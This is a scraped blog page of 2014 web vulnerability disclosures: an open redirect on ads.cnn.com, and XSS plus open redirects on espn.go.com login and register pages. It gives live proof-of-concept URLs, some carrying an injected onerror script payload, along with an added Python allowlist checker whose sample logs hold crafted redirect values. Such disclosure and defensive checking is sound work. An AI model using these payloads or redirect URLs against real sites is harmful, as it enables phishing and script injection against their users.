<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be</a></span></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-city-related-links.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-travel-city-related-links.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) CNN cnn.com ADS Open Redirect Web Security Bug</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">ads.cnn.com</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The flaw occurs on the "event.ng" page, in the "&Redirect" parameter, i.e.</span></div>
<div>
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2fgoogle.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">According to OWASP, an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. It could allow an attacker to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are effective because the crafted URL initially appears to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The following test illustrates the scenario described above.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The redirected webpage address is "<a href="http://webcabinet.tumblr.com/">http://webcabinet.tumblr.com/</a>". Suppose that this webpage is malicious.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL:</span></div>
<div>
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fcnn.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2fcnn.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2ftetraph.com%2Fblog" target="_blank">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2f</a><a href="http://webcabinet.tumblr.com/">webcabinet.tumblr.com</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br class="Apple-interchange-newline" /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Since CNN is well known worldwide, this vulnerability can be used to carry out "<a href="http://tetraph.com/covert_redirect/">Covert Redirect</a>" attacks against other websites.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
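<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Added example (not from the original advisory and not CNN's code): one way to validate the Redirect value of an event.ng-style URL against a host allowlist, and to flag off-site targets when reviewing request logs. The allowlist, the fallback URL, the assumption that Redirect is the last field, and the log lines are all constructed for illustration.</span></div>

```python
"""Allowlist check for the Redirect field of an event.ng-style click URL.
Added illustration: hosts, fallback and log lines are constructed."""
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"cnn.com", "edition.cnn.com"}  # assumption: approved landing hosts
FALLBACK = "http://cnn.com/"                     # assumption: fixed safe page
MARKER = "Redirect="


def redirect_target(request_path):
    """Return the percent-decoded Redirect value, or None if the field is absent.
    Assumes Redirect is the last field, so its value may itself contain '&'."""
    _, sep, raw = request_path.partition(MARKER)
    return unquote(raw) if sep else None


def is_allowed(target):
    """Accept only absolute http(s) URLs whose exact host is on the allowlist."""
    if not target or target != target.strip() or "\\" in target:
        return False  # empty, padded, or backslash forms that parsers disagree on
    if any(ord(ch) < 0x20 for ch in target):
        return False  # control characters (CR, LF, TAB)
    try:
        parts = urlsplit(target)
        host = (parts.hostname or "").rstrip(".").lower()
        has_userinfo = parts.username is not None or parts.password is not None
    except ValueError:
        return False  # malformed authority, e.g. an unbalanced IPv6 bracket
    if parts.scheme not in ("http", "https") or has_userinfo:
        return False  # no scheme-relative, non-web scheme or user@host targets
    return host in ALLOWED_HOSTS  # exact match, so look-alike suffixes fail


def resolve_redirect(request_path):
    """Value the handler should put in Location: the target, or the fallback."""
    target = redirect_target(request_path)
    return target if is_allowed(target) else FALLBACK


# Constructed log lines ("METHOD path") in the shape of the URLs on this page.
_BASE = "GET /event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues="
SAMPLE_LOG = [
    _BASE + "&Redirect=http:%2f%2fcnn.com",
    _BASE + "&Redirect=http:%2f%2fwebcabinet.tumblr.com",
    _BASE + "&Redirect=%2f%2fother.example%2flogin",
    _BASE + "&Redirect=http:%2f%2fcnn.com%40other.example%2f",
    _BASE + "&Redirect=https:%2f%2fcnn.com.other.example%2f",
    _BASE,  # no Redirect field at all
]


def flag_off_site(lines):
    """Return (line_number, decoded_target) for each redirect failing the check."""
    hits = []
    for number, line in enumerate(lines, 1):
        target = redirect_target(line.split(" ", 1)[1])
        if target is not None and not is_allowed(target):
            hits.append((number, target))
    return hits


if __name__ == "__main__":
    for number, target in flag_off_site(SAMPLE_LOG):
        print("line", number, "off-site redirect target:", target)
```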
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2) </b><b style="line-height: 21.7777786254883px; text-align: justify;">PoC Video:</b></span></div>
<div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be</a></span></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-ads-open-redirect-security.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-ads-open-redirect-security.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.6000003814697px; text-align: justify;"><br class="Apple-interchange-newline" />These vulnerabilities were reported to CNN in early July through the contact form here, but they have still not been patched.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.6000003814697px; text-align: justify;"><a href="http://edition.cnn.com/feedback/#cnn_FBKCNN_com" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://edition.cnn.com/feedback/#cnn_FBKCNN_com</a></span><br />
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/128">http://seclists.org/fulldisclosure/2014/Dec/128</a></span><br />
<a href="http://lists.openwall.net/full-disclosure/2014/12/29/6"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2014/12/29/6</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1395"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1395</span></a><br />
<a href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141988778706126&w=2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</span></a><br />
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-53939905742051847522015-06-05T07:49:00.000-07:002015-06-05T07:57:38.424-07:00ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities<div>
<a href="http://2.bp.blogspot.com/-ngmpdbJUJwY/VIb-dSEKSXI/AAAAAAAAAiA/D9V1TR42wmc/s1600/espn_games_xss1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-ngmpdbJUJwY/VIb-dSEKSXI/AAAAAAAAAiA/D9V1TR42wmc/s1600/espn_games_xss1.png" width="400" /></span></a><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities</span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">http://espn.go.com/</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.7037048339844px;">"ESPN (originally an acronym for Entertainment and Sports Programming Network) is a U.S.-based global cable and satellite television channel that is owned by ESPN Inc., a joint venture between The Walt Disney Company (which operates the network, through its 80% controlling ownership interest) and Hearst Corporation (which holds the remaining 20% interest). The channel focuses on sports-related programming including live and recorded event telecasts, sports news and talk shows, and other original programming.</span></span><br />
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.7037048339844px; text-align: justify;">ESPN broadcasts primarily from studio facilities located in Bristol, Connecticut. The network also operates offices in Miami, New York City, Seattle, Charlotte, and Los Angeles. John Skipper currently serves as president of ESPN, a position he has held since January 1, 2012. While ESPN is one of the most successful sports networks, it has been subject to criticism, which includes accusations of biased coverage, conflict of interest, and controversies with individual broadcasters and analysts. ESPN headquarters in Bristol, Connecticut. As of February 2015, ESPN is available to approximately 94,396,000 paid television households (81.1% of households with at least one television set) in the United States. In addition to the flagship channel and its seven related channels in the United States, ESPN broadcasts in more than 200 countries, operating regional channels in Australia, Brazil, Latin America and the United Kingdom, and owning a 20% interest in The Sports Network (TSN) as well as its five sister networks and NHL Network in Canada.</span><span style="line-height: 19.7037048339844px; text-align: justify;">"(Wikipedia)</span></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://espn.go.com/" target="_blank">Espn.go.com</a> has web security vulnerabilities. It is vulnerable to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open Redirect) attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Those vulnerabilities are very dangerous because they occur on ESPN's "login" & "register" pages, which users regard as credible. Attackers can abuse those links to mislead ESPN's users. The success rate of attacks may be high.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">During the tests, besides the links given above, a large number of ESPN's links were found to be vulnerable to those attacks.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The programming code flaw occurs at the "login" & "register" pages of "espn.go.com" with the "redirect" parameter, i.e.</span></div>
<div>
<a href="http://streak.espn.go.com/en/login?redirect=" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=</span></a></div>
<div>
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com</span></a></div>
<div>
<a href="http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://games.espn.go.com/<wbr></wbr>world-cup-bracket-predictor/<wbr></wbr>2014/es/login?redirect=</span></a></div>
<div>
<a href="https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://register.go.com/go/<wbr></wbr>sendMemberNames?regFormId=<wbr></wbr>espn&appRedirect=http://<wbr></wbr>register.go.com/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 8.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br class="Apple-interchange-newline" />Disclosed by:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Wang Jing, </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="font-family: Arial, Helvetica, sans-serif; text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/546910247650996224" style="line-height: 17.8181819915772px;">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span><br />
<div style="line-height: 17.8181819915772px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif; text-align: justify;"><a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" Many of the following classes of web security issue have been published on the list: Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories and solution details related to XSS and Open Redirect vulnerabilities, and cyber intelligence recommendations.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) XSS Web Security Vulnerability</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. According to Acunetix, exploited XSS is commonly used to achieve the following malicious results:</span><br />
<br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Identity theft</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Accessing sensitive or restricted information</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Gaining free access to otherwise paid for content</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Spying on user’s web browsing habits</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Altering browser functionality</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Public defamation of an individual or corporation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web application defacement</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Denial of Service attacks</span></li>
</ul>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URLs:</span></b></div>
<div>
<a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fstreak.espn.go.com%2Fen%<wbr></wbr>2FcreateOrUpdateEntrylive%<wbr></wbr>3Fgooglematchup%3Dm32620o35459</span></a></div>
<div>
<a href="http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://games.espn.go.com/<wbr></wbr>world-cup-bracket-predictor/<wbr></wbr>2014/es/login?redirect=http%<wbr></wbr>3A%2F%2Fgames.espn.go.com%<wbr></wbr>2Fworld-cup-bracket-linkedin-<wbr></wbr>predictor%2Fvk%2F2014%2Fes%<wbr></wbr>2Fgame%3Famazon%3Dcreate</span></a></div>
<div>
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com%2Fgame%<wbr></wbr>3Famazon%3Dcreate%2Fmembers%<wbr></wbr>2FmodifyNewsletters%<wbr></wbr>3FpageNamepaypal%<wbr></wbr>3DESPNNewsletterPage&language=<wbr></wbr>en&affiliateName=espn&<wbr></wbr>regFormId=reddit</span></a></div>
<div>
<a href="https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://register.go.com/go/<wbr></wbr>sendMemberNames?aff_code=go&<wbr></wbr>appRedirect=http://register.<wbr></wbr>go.com/disney/ebay/<wbr></wbr>GuestServices/<wbr></wbr>YourYahooAccount/login</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459" target="_blank">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fstreak.espn.go.com%2Fen%<wbr></wbr>2Fyandex%<wbr></wbr>2FcreateOrUpdateEntrylive%<wbr></wbr>3Fgooglematchup%3Dm32620o35459</a><wbr></wbr>"><img src=x onerror=prompt('justqdjing')></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn" target="_blank">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com%2Fgame%<wbr></wbr>3Famazon%3Dcreate%2Fmembers%<wbr></wbr>2FmodifyNewsletters%<wbr></wbr>3FpageName%<wbr></wbr>3DESPNNewsletterPage&language=<wbr></wbr>en&affiliateName=espn&<wbr></wbr>regFormId=espn</a>"><img src=x onerror=prompt('justqdjing')></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate" target="_blank">http://games.espn.go.com/nfl-<wbr></wbr>gridiron-challenge/2014/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fgames.espn.go.com%2Fnfl-<wbr></wbr>gridiron-challenge%2Febay2014%<wbr></wbr>2Ffacebookesgame%3Fstep%<wbr></wbr>3Dcreate</a>"><img src=x onerror=prompt('justqdjing')></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
